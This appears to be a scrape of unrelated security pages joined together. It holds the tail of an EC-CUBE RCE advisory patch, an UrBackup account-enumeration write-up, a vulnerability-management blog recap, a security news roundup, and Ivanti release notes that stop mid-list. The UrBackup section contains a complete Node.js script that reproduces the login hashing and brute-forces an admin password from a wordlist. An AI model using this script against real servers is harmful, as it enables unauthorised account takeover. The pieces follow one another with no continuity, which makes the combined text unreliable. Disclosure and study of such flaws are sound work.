18

+  

19

+ class SecurityPolicyDecorator implements SecurityPolicyInterface {

20

+  

21

+ /\*\* @var BasePolicy \*/

22

+ private $securityPolicy;

23

+  

24

+ public function \_\_construct(BasePolicy $securityPolicy)

25

+ {

26

+ $this->securityPolicy = $securityPolicy;

27

+ }

28

+  

29

+ public function checkSecurity($tags, $filters, $functions)

30

+ {

31

+ $this->securityPolicy->checkSecurity($tags, $filters, $functions);

32

+ }

33

+  

34

+ public function checkMethodAllowed($obj, $method)

35

+ {

36

+ // \_\_toStringの場合はチェックをスキップする

37

+ if ($method === '\_\_toString') {

38

+ return;

39

+ }

40

+ $this->securityPolicy->checkMethodAllowed($obj, $method);

41

+ }

42

+  

43

+ public function checkPropertyAllowed($obj, $method)

44

+ {

45

+ $this->securityPolicy->checkPropertyAllowed($obj, $method);

46

+ }

47

+ }

**問い合わせ先**

本脆弱性に関するお問合せ：

EC-CUBE 運営チーム  
MAIL: support@ec-cube.net

**謝辞**

本脆弱性は、

*   株式会社エヌ・エフ・ラボラトリーズ 三浦 剛様

よりご報告いただきました。  
この場をお借りして、厚く御礼申し上げます。

CVE-2023-46845: EC-CUBE4系におけるRCE可能な脆弱性(JVN#29195731)

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

CVE-2023-47102: Quantiano

Hello everyone! October was an interesting and busy month for me. I started a new job, worked on my open source Vulristics project, and analyzed vulnerabilities using it. Especially Linux vulnerabilities as part of my new Linux Patch Wednesday project. And, of course, analyzed Microsoft Patch Tuesday as well. In addition, at the end of […]

Hello everyone! October was an interesting and busy month for me. I started a new job, worked on my open source Vulristics project, and analyzed vulnerabilities using it. Especially Linux vulnerabilities as part of my new Linux Patch Wednesday project. And, of course, analyzed Microsoft Patch Tuesday as well. In addition, at the end of October I was a guest lecturer at MIPT/PhysTech university. But first thing first.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239138

On October 3, I joined the Positive Technologies team. There I will work on developing Vulnerability Management practices. I have already worked at PT for 6 years, from June 2009 to October 2015. And now, exactly 8 years later, I’m here again. I feel very pleasant emotions about this and have many plans. 🤩 I am sure that in the PT team I will be able to implement many cool things for the development of Vulnerability Management in Russia and abroad. 🙂

**Vulristics**

As for my open source Vulristics vulnerability prioritization project, I’ve made a few important updates.

**NVD Data Source**

I corrected the NVD data source, because NVD has become much less tolerant in the use of its API. After 5 consecutive requests, the API returns an error:

    
    <html><body><h1>403 Forbidden</h1>
    Request forbidden by administrative rules.
    </body></html>

Request forbidden by administrative rules.

According to the documentation:

> “The public rate limit (without an API key) is 5 requests in a rolling 30 second window; the rate limit with an API key is 50 requests in a rolling 30 second window”.

For Vulristics, I made support for authentication using the NVD API key and sleeps of 0.6 seconds when using the key and 6 seconds without using the key.

To obtain an NVD API key, you need to specify your organization, organization type, and email in the form. After a few seconds, you will receive a one-time link via email, which will give you the key.

I also started using the NVD API v2.0 in Vulristics, which allowed me to get CISA KEV data on vulnerabilities being exploited in the wild. I also take links to exploits from NVD (however, be careful, these links are not always good enough).

**Custom Data Source**

I added a custom data source to Vulristics. This is a small but quite useful improvement. Sometimes you know for sure that there is an exploit for a vulnerability or a sign of exploitation in the wild. But the sources that Vulristics supports do not contain this data. 🤷‍♂️ How to take into account such facts in a Vulristics report?

Vulristics now has a custom data source. It does not make any requests to external sources. It simply reads JSON files from the data/custom\_cve directory. You can add your JSON file for some CVE to this directory. And you can set the parameters in this file that you want to define for this CVE. You don’t have to set all the parameters. You can only set the ones you want. For example, only links to exploits.

Of course, you don’t have to do this manually. You can generate such files using a script based on the data you have. 😉

File example:

    {
      "description": "Remote Code Execution in Chromium",
      "cvss_base_score": 9.2,
      "wild_exploited": true,
      "wild_exploited_sources": [
        {"type": "ransomware_info_source", "text": "RansomwareINFO", "url": "https://www.some-site-about-ransomware-attacks.com/12345"}
      ],
      "public_exploit": true,
      "public_exploit_sources": [
        {"type": "exploit_info_source", "text": "ExploitINFO", "url": "https://www.some-site-about-exploits.com/12345"}
      ],
      "epss": 0.97434,
      "epss_percentile": 0.99924
    }

**Linux Patch Wednesday**

I launched my new project – Linux Patch Wednesday! 🚀🥳 For Microsoft products we have a single day of increased attention – Microsoft Patch Tuesday, and for Linux there is no such day. Everything is too fragmented there and patches are released literally every day. But what’s stopping us from independently generating a list of CVEs fixed during the month and highlighting critical issues? Let’s try!

If Microsoft Patch Tuesday occurs every second Tuesday of the month, then Linux Patch Wednesday will occur **every third Wednesday** of the month!

I analyzed the public OVAL content of 5 Linux distribution vendors and uploaded the resulting monthly Linux Patch Wednesday bullruetins to Github. From March 2007 to November 2023. I invite you to check it out and, if you like it, give it a star. 🙂⭐️

I analyzed first October Linux Patch Wednesday bulletin using Vulristics! 🥳

I’m pleased with the result. The top looks adequate and corresponds to what I highlighted in my Russian-language telegram channel avleonovrus and blog avleonov.ru.

1.  **Memory Corruption** – Chromium (CVE-2023-5217). This is a vulnerability in the libvpx library, which was the most critical in the October Microsoft Patch Tuesday. There is a PoC on Github and signs of exploitation in the wild.
2.  **Elevation of Privilege** **/ Remote Code Execution** – GNU C Library (CVE-2023-4911). This is Qualys Looney Tunables. There has been a PoC for this vulnerability for a long time, but there are no signs of exploitation in the wild yet.
3.  **Denial of Service** – Golang Go (CVE-2023-29409). There is a PoC. Vulristics detected the software as TLS, since there is no hint of Go in the description of the CVE vulnerability. 🤷‍♂️
4.  **Denial of Service** – HTTP/2 protocol (CVE-2023-44487). Will also be in MSPT.  
    …
5.  **Memory Corruption** – Curl (CVE-2023-38545). Not a very critical vulnerability, but PoCs have appeared for it on Github.

The rest of the vulnerabilities are without exploits or signs of exploitation in the wild.

Full Vulristics report: linux\_patch\_wednesday\_october2023

**Microsoft Patch Tuesday October 2023**

I also released the Vulristics report on October’s Microsoft Patch Tuesday.

What is in the TOP:

1.  **Memory Corruption** – Microsoft Edge (CVE-2023-5217). This is a vulnerability in the libvpx library, which is used to play video in VP8 format. As in the recent libwebp case, this vulnerability affects many software products, but primarily web browsers. There is no public exploit yet, but there are signs of exploitation in the wild.
2.  **Elevation of Privilege** – Skype for Business (CVE-2023-41763). In fact, this is an information disclosure vulnerability. An unauthenticated attacker may send a special request to a vulnerable Skype for Business server and this will lead to the disclosure of confidential information. Such information may be used to gain access to internal networks. 🤷‍♂️ There are signs of exploitation in the wild and there are no public exploits yet. Several RCEs have also been released for Skype for Business.
3.  **Information Disclosure** – Microsoft WordPad (CVE-2023-36563). Exploiting this vulnerability could allow the disclosure of NTLM hashes. An attacker must send the user a malicious file and convince him to open it. Or, if an attacker has access to the host, he himself can run a special program on the host with the same result. This looks dangerous. There are signs of exploitation in the wild and there are no public exploits yet.
4.  **Denial of Service** – HTTP/2 protocol (CVE-2023-44487). Microsoft has released fixes for IIS (HTTP.sys), .NET (Kestrel) and Windows against the new effective DDoS attack “HTTP/2 Rapid Reset”. The problem is universal. Amazon, Cloudflare and Google recently reported that they were attacked via “HTTP/2 Rapid Reset”. So there are signs of exploitation in the wild.

There were no more vulnerabilities in Patch Tuesday that showed signs of exploitation in the wild or had a publicly exploit. You can also pay attention to:

🔻 20 Microsoft Message Queuing vulnerabilities, including some **RCEs**.  
🔻 **Remote Code Execution** – Microsoft Exchange (CVE-2023-36778). “Successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell remoting session”. It doesn’t seem particularly critical, however “Exploitation More Likely.”  
🔻 **Elevation of Privilege** – Windows IIS Server (CVE-2023-36434). This is achieved through simplified password brute-force attack. 🤷‍♂️  
🔻 A pack of **Elevation of Privilege** vulnerabilities in Windows Win32k and Windows Graphics Component. Successful exploitation of the vulnerability may allow an attacker to gain SYSTEM privileges.

Full Vulristics report: ms\_patch\_tuesday\_october2023\_report

**Other Vulnerabilities**

And finally, let’s note other important vulnerabilities, which I also wrote about in October in Russian

1\. **Authentication Bypass / Privilege Escalation** – Cisco IOS XE (CVE-2023-20198)

2\. **Authentication** **Bypass** – Confluence (CVE-2023-22515)

3\. VMware vulnerabilities: **Remote code execution** – vCenter Server (CVE-2023-34048) and **Authentication Bypass** – Aria Operations for Logs (CVE-2023-34051).

4\. “Citrix Bleed“: **Information Disclosure** – NetScaler ADC/Citrix ADC and NetScaler Gateway (CVE-2023-4966)

5\. JetBrains: **Remote code execution** – TeamCity (CVE-2023-42793).

6\. Full disclosure for unfixed Squid vulnerabilities.

**VM Vendors news**

From VM vendor news, I would like to highlight the following.

Miercom released a report “Vulnerability Management Competitive Assessment“. They did the research at the request of Tenable, so there couldn’t be much intrigue about who among Tenable, Qualys and Rapid7 would win. 😏 Unlike similar marketing comparisons, Miercom decided not to ask customers of the vendors or compare on high-level features. They compared based on basic functionality, namely the completeness of the detection databases. It’s nice to know that I myself was involved in comparing CVE knowledge bases and identifying blind spots before it became mainstream. 😅

The guys from the Vulners team presented a new version of the automatic metric for assessing the criticality of vulnerabilities – AI Score v2. As the name implies, data processing there is carried out using machine learning, and specifically using the CatBoost library. Relationships between objects (there are more than 3 million objects in Vulners), CVSS Base Score values of ancestor objects, object type, text description of the object, etc. are analyzed. Give it a try, this feature is available for free to all Vulners users.

**PhysTech Lecture**

At the end of the month, I gave a lecture on Vulnerability Management at the Moscow PhysTech university. This is the second time, the first was 5 years ago. This time remotely.

On occasion, I updated my educational presentation. I separated 4 approximately equal parts:

🔹 Security Analysis – vulnerabilities and vulnerability detection  
🔹 Asset Management – getting rid of chaos in infrastructure  
🔹 Vulnerability Management – building a process with a focus on prioritizing vulnerabilities  
🔹 Patch Management – everything related to patching vulnerabilities and relationships with IT

I primarily reworked the Asset Management and Vulnerability Management parts. It seems that I managed to combine the effective safety approach (by Positive Technologies), the guidelines of regulators and my own considerations quite well. This presentation would be good for guest lectures, and it is clear how it could usefully be expanded to 4 separate lectures (or even more). I’m satisfied. 🙂

By the way, PhysTech is under sanctions of the EU, USA, UK, Japan, Switzerland and New Zealand. A decent place. 🙂👍

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

October 2023: back to Positive Technologies, Vulristics updates, Linux Patch Wednesday, Microsoft Patch Tuesday, PhysTech VM lecture

Plus: SolarWinds is charged with fraud, New Orleans police face recognition has flaws, and new details about Okta’s October data breach emerge.

As the Israel-Hamas war continues, with Israeli troops moving into the Gaza Strip and encircling Gaza City, one piece of technology is having an outsized impact on how we see and understand the war. Messaging app Telegram, which has a history of lax moderation, has been used by Hamas to share gruesome images and videos. The information has then spread to other social networks and millions more eyeballs. Sources tell WIRED that Telegram has been weaponized to spread horrific propaganda.

Microsoft has had a hard few months when it comes to the company’s own security, with Chinese-backed hackers stealing its cryptographic signing key, continued issues with Microsoft Exchange Servers, and its customers being impacted by failings. The company has now unveiled a plan to deal with the ever-growing range of threats. It’s the Secure Future Initiative, which plans, among multiple elements, to use AI-driven tools, improve its software development, and shorten its response time to vulnerabilities.

Also this week, we’ve looked at the privacy practices of Bluesky, Mastodon, and Meta’s Threads as all of the social media platforms jostle for space in a world where X, formerly known as Twitter, continues to implode. And things aren’t exactly great with this next generation of social media. With November arriving, we now have a detailed breakdown of the security vulnerabilities and patches issued last month. Microsoft, Google, Apple, and enterprise firms Cisco, VMWare, and Citrix all fixed major security flaws in October.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The Flipper Zero is a versatile hacking tool designed for security researchers. The pocket-size pen-testing device can intercept and replay all kinds of wireless signals—including NFC, infrared, RFID, Bluetooth, and Wi-Fi. That means it's possible to read microchips and inspect signals being admitted from devices. Slightly more nefariously, we've found it can easily clone building-entry cards and read credit card details through people's clothes.

Over the last few weeks, the Flipper Zero, which costs around $170, has been gaining some traction for its ability to disrupt iPhones, particularly by sending them into denial of service (DoS) loops. As Ars Technica reported this week, the Flipper Zero, with some custom firmware, is able to send “a constant stream of messages” asking iPhones to connect via Bluetooth devices such as an Apple TV or AirPods. The barrage of notifications, which is sent by a nearby Flipper Zero, can overwhelm an iPhone and make it virtually unusable.

“My phone was getting these pop-ups every few minutes, and then my phone would reboot,” security researcher Jeroen van der Ham told Ars about a DoS attack he experienced while commuting in the Netherlands. He later replicated the attack in a lab environment, while other security researchers have also demonstrated the spamming ability in recent weeks. In van der Ham’s tests, the attack only worked on devices running iOS 17—and at the moment, the only way to prevent the attack is by turning off Bluetooth.

In 2019, hackers linked to Russia’s intelligence service broke into the network of software firm SolarWinds, planting a backdoor and ultimately finding their way into thousands of systems. This week, the US Securities and Exchange Commission charged Tim Brown, the CISO of SolarWinds, and the company with fraud and “internal control failures.” The SEC alleges that Brown and the company overstated SolarWinds’ cybersecurity practices while “understating or failing to disclose known risks.” The SEC claims that SolarWinds knew of “specific deficiencies” in the company’s security practices and made public claims that weren’t reflected in its own internal assessments.

“Rather than address these vulnerabilities, SolarWinds and Brown engaged in a campaign to paint a false picture of the company’s cyber controls environment, thereby depriving investors of accurate material information,” Gurbir S. Grewal, director of the SEC’s Division of Enforcement said in a statement. In response, Sudhakar Ramakrishna, the CEO of SolarWinds, said in a blog post that the allegations are part of a “misguided and improper enforcement action.”

For years, researchers have shown that face recognition systems, trained on millions of pictures of people, can misidentify women and people of color at disproportionate rates. The systems have led to wrongful arrests. A new investigation from Politico, focusing on a year’s worth of face recognition requests made by police in New Orleans, has found that the technology was almost exclusively used to try to identify Black people. The system also “failed to identify suspects a majority of the time,” the report says. Analysis of 15 requests for the use of face recognition technology found that only one of them was for a white suspect, and in nine cases the technology failed to find a match. Three of the six matches were also incorrect. “The data has pretty much proven that \[anti-face-recognition\] advocates were mostly correct,” one city councilor said.

Identity management company Okta has revealed more details about an intrusion into its systems, which it first disclosed on October 20. The company said the attackers, who had accessed its customer support system, accessed files belonging to 134 customers. (In these instances, customers are individual companies that subscribe to Okta’s services). “Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” the company disclosed in a blog post. These session tokens were used to “hijack” the Okta sessions of five separate companies. 1Password, BeyondTrust, and Cloudflare have all previously disclosed they detected suspicious activity, but it is not clear who the two remaining companies are.

This Cheap Hacking Device Can Crash Your iPhone With Pop-Ups

Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability

Release Information: Product: AvalanchePremise\_6.4.1.236 Description: Avalanche Premise 6.4.1.236 for Windows Version: v6.4.1.236 Notes: Avalanche 6.4.1.236 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2022-43554 ZDI-CAN-19502 CVE-2022-43555 ZDI-CAN-19503 CVE-2023-41725 ZDI-CAN-21006 CVE-2023-32567 ZDI-CAN-21030 CVE-2023-41726 ZDI-CAN-21231 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.1 Description: Avalanche Premise 6.4.1 for Windows Version: v6.4.1.207 Notes: Avalanche 6.4.1 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2023-32560 TRA-470 Reported by a researcher at Tenable CVE-2023-32561 ZDI-CAN-20904 CVE-2023-32562 ZDI-CAN-20991 CVE-2023-32563 ZDI-CAN-21081 CVE-2023-32564 ZDI-CAN-21002 CVE-2023-32565 ZDI-CAN-21004 CVE-2023-32566 ZDI-CAN-21005 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.0 Description: Avalanche Premise 6.4.0 for Windows Version: v6.4.0.186 Notes: Avalanche 6.4.0 Release What's New in This Version -------------------------- New features and enhancements: -Added scheduled reboot functionality -Added reboot functionality to WindowsCE device details page for supported devices/enabler -Added scheduled and manual reboots to Audit Log -Android Client Admin password moved to Android Restriction Payload from SDS Profile -Update Play Store search results UI in AE software payload -Update Play Store search results UI in AE restrictions payload -Add major os version device property to Smartdevices (SDS Controlled) OsVer 9.1.2 => OsVerMajor 009 OsVer 11.3 => OsVerMajor 011 OsVer 13 => OsVerMajor 013 OsVer funkyformat => OsVerMajor 000 OsVer missing => OsVerMajor 000 -The default CFS/LFS port is changed to 9019 in the installer on a clean install to avoid possible conflict with neurons/cloud agent -Scan to Config Profile UI updated to modern design Deprecated features: -5.3 Migration support removed. To upgrade from 5.3, you first need to upgrade to 6.2 or 6.3 , then updgrade to 6.4.0 -GCM settings retired: Remove GCM configuration in SDS profile Remove GCM as option in Enrollment rules if a pre-existing enrollment rule from 6.3 or previous had GCM set as the notification type, it will get changed to ANS in 6.4 Security hardening: -InfoRail Router encryption enforcement -InfoRail Access control API key creation page in support and licensing page -InfoRail API key field added to remote dserver installers -InfoRail options screen added to Installer (clear existing keys, legacy access, legacy ACE access) -User password strength on user password creation/edit -Double password fields (enter/confirm) have been changed to a single password field with a toggle to view password on creation or edit -Passwords are no longer viewable after changes have been saved \*\*Password fields in legacy WIndowsCE profiles have not been changed Fixes: Defect: Clicking on smart device location history logout and exception error Defect: dserver Profiles not displayed in deployment dialog Defect: Avalanche inventory search bar fails to retrieve devices by serial number Defect: SDS not observing the check in time interval, always using 24hrs Fix to address ZDI-CAN-17729 Fix to address ZDI-CAN-17750 Fix to address ZDI-CAN-17769 Fix to address ZDI-CAN-17812 Fix to address ZDI-CAN-19513 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Product: AvalanchePremise\_6.3.4 Description: Avalanche Premise 6.3.4 for Windows Version: v6.3.4.153 Notes: Avalanche 6.3.4 Release What's New in This Version: Support for Battery Campaigns in Neurons Support for Device Actions in Neurons User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Fixes: Fix to address CVE-2021-44228 Fix to address CVE-2022-22965 Fix to address ZDI-CAN-15301 Fix to address ZDI-CAN-15328 Fix to address ZDI-CAN-15329 Fix to address ZDI-CAN-15330 Fix to address ZDI-CAN-15332 Fix to address ZDI-CAN-15333 Fix to address ZDI-CAN-15449 Fix to address ZDI-CAN-15493 Fix to address 